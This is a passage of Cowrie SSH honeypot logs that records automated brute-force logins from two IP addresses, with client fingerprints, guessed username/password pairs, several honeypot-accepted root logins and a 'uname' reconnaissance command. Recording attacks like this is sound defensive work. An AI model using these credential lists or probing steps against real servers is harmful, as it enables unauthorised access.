{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:40:03.044599Z","src_ip":"212.227.125.160","session":"0430bf099475"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:03.165754Z","src_ip":"212.227.125.160","session":"0430bf099475"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:03.166867Z","src_ip":"212.227.125.160","session":"0430bf099475"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33060,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4dd3ebcfbe3","protocol":"ssh","message":"New connection: 212.227.125.160:33060 (1.2.3.4:22) [session: d4dd3ebcfbe3]","sensor":"my-vps","timestamp":"2025-08-31T00:40:12.198013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:40:12.198796Z","src_ip":"212.227.125.160","session":"d4dd3ebcfbe3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:40:12.273206Z","src_ip":"212.227.125.160","session":"d4dd3ebcfbe3"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:40:12.561156Z","src_ip":"212.227.125.160","session":"d4dd3ebcfbe3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:13.713139Z","src_ip":"212.227.125.160","session":"d4dd3ebcfbe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49630,"dst_ip":"1.2.3.4","dst_port":22,"session":"62bfb4ecd65f","protocol":"ssh","message":"New connection: 212.227.235.229:49630 (1.2.3.4:22) [session: 62bfb4ecd65f]","sensor":"my-vps","timestamp":"2025-08-31T00:40:21.074867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:40:21.075858Z","src_ip":"212.227.235.229","session":"62bfb4ecd65f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:40:21.378195Z","src_ip":"212.227.235.229","session":"62bfb4ecd65f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35768,"dst_ip":"1.2.3.4","dst_port":22,"session":"95a2895af4ac","protocol":"ssh","message":"New connection: 212.227.125.160:35768 (1.2.3.4:22) [session: 95a2895af4ac]","sensor":"my-vps","timestamp":"2025-08-31T00:40:22.616884Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:40:22.617875Z","src_ip":"212.227.125.160","session":"95a2895af4ac"}
{"eventid":"cowrie.login.failed","username":"vnc","password":"vnc123","message":"login attempt [vnc/vnc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:40:22.644470Z","src_ip":"212.227.235.229","session":"62bfb4ecd65f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:40:22.692477Z","src_ip":"212.227.125.160","session":"95a2895af4ac"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:40:22.930944Z","src_ip":"212.227.125.160","session":"95a2895af4ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:40:23.255036Z","src_ip":"212.227.125.160","session":"95a2895af4ac"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:40:23.255975Z","src_ip":"212.227.125.160","session":"95a2895af4ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:23.331508Z","src_ip":"212.227.125.160","session":"95a2895af4ac"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:23.332739Z","src_ip":"212.227.125.160","session":"95a2895af4ac"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:23.949289Z","src_ip":"212.227.235.229","session":"62bfb4ecd65f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44684,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4fbae5dc86b","protocol":"ssh","message":"New connection: 212.227.235.229:44684 (1.2.3.4:22) [session: e4fbae5dc86b]","sensor":"my-vps","timestamp":"2025-08-31T00:40:24.417178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:40:27.067874Z","src_ip":"212.227.235.229","session":"e4fbae5dc86b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:40:27.068833Z","src_ip":"212.227.235.229","session":"e4fbae5dc86b"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abc123","message":"login attempt [backup/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:40:31.408275Z","src_ip":"212.227.235.229","session":"e4fbae5dc86b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45506,"dst_ip":"1.2.3.4","dst_port":22,"session":"0932f914c729","protocol":"ssh","message":"New connection: 212.227.125.160:45506 (1.2.3.4:22) [session: 0932f914c729]","sensor":"my-vps","timestamp":"2025-08-31T00:40:33.024294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:40:33.025307Z","src_ip":"212.227.125.160","session":"0932f914c729"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:33.057424Z","src_ip":"212.227.235.229","session":"e4fbae5dc86b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:40:33.098449Z","src_ip":"212.227.125.160","session":"0932f914c729"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:40:33.318516Z","src_ip":"212.227.125.160","session":"0932f914c729"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:40:33.664529Z","src_ip":"212.227.125.160","session":"0932f914c729"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:40:33.665215Z","src_ip":"212.227.125.160","session":"0932f914c729"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:33.739063Z","src_ip":"212.227.125.160","session":"0932f914c729"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:33.740201Z","src_ip":"212.227.125.160","session":"0932f914c729"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56856,"dst_ip":"1.2.3.4","dst_port":22,"session":"90bdcac4352d","protocol":"ssh","message":"New connection: 212.227.125.160:56856 (1.2.3.4:22) [session: 90bdcac4352d]","sensor":"my-vps","timestamp":"2025-08-31T00:40:43.405102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:40:43.406120Z","src_ip":"212.227.125.160","session":"90bdcac4352d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:40:43.479813Z","src_ip":"212.227.125.160","session":"90bdcac4352d"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T00:40:43.727738Z","src_ip":"212.227.125.160","session":"90bdcac4352d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:44.877999Z","src_ip":"212.227.125.160","session":"90bdcac4352d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35810,"dst_ip":"1.2.3.4","dst_port":22,"session":"28d404549dc9","protocol":"ssh","message":"New connection: 212.227.125.160:35810 (1.2.3.4:22) [session: 28d404549dc9]","sensor":"my-vps","timestamp":"2025-08-31T00:40:47.276553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:40:47.579788Z","src_ip":"212.227.125.160","session":"28d404549dc9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:40:47.603944Z","src_ip":"212.227.125.160","session":"28d404549dc9"}
{"eventid":"cowrie.login.failed","username":"backup","password":"abc123","message":"login attempt [backup/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:40:50.043738Z","src_ip":"212.227.125.160","session":"28d404549dc9"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:51.573597Z","src_ip":"212.227.125.160","session":"28d404549dc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48546,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d66f4728f52","protocol":"ssh","message":"New connection: 212.227.125.160:48546 (1.2.3.4:22) [session: 4d66f4728f52]","sensor":"my-vps","timestamp":"2025-08-31T00:40:53.798312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:40:53.799445Z","src_ip":"212.227.125.160","session":"4d66f4728f52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:40:53.872633Z","src_ip":"212.227.125.160","session":"4d66f4728f52"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:40:54.094112Z","src_ip":"212.227.125.160","session":"4d66f4728f52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:40:54.423398Z","src_ip":"212.227.125.160","session":"4d66f4728f52"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:40:54.424108Z","src_ip":"212.227.125.160","session":"4d66f4728f52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:54.498727Z","src_ip":"212.227.125.160","session":"4d66f4728f52"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:40:54.499913Z","src_ip":"212.227.125.160","session":"4d66f4728f52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55540,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7c2b48210f3","protocol":"ssh","message":"New connection: 212.227.125.160:55540 (1.2.3.4:22) [session: b7c2b48210f3]","sensor":"my-vps","timestamp":"2025-08-31T00:41:04.234572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:41:04.235732Z","src_ip":"212.227.125.160","session":"b7c2b48210f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@o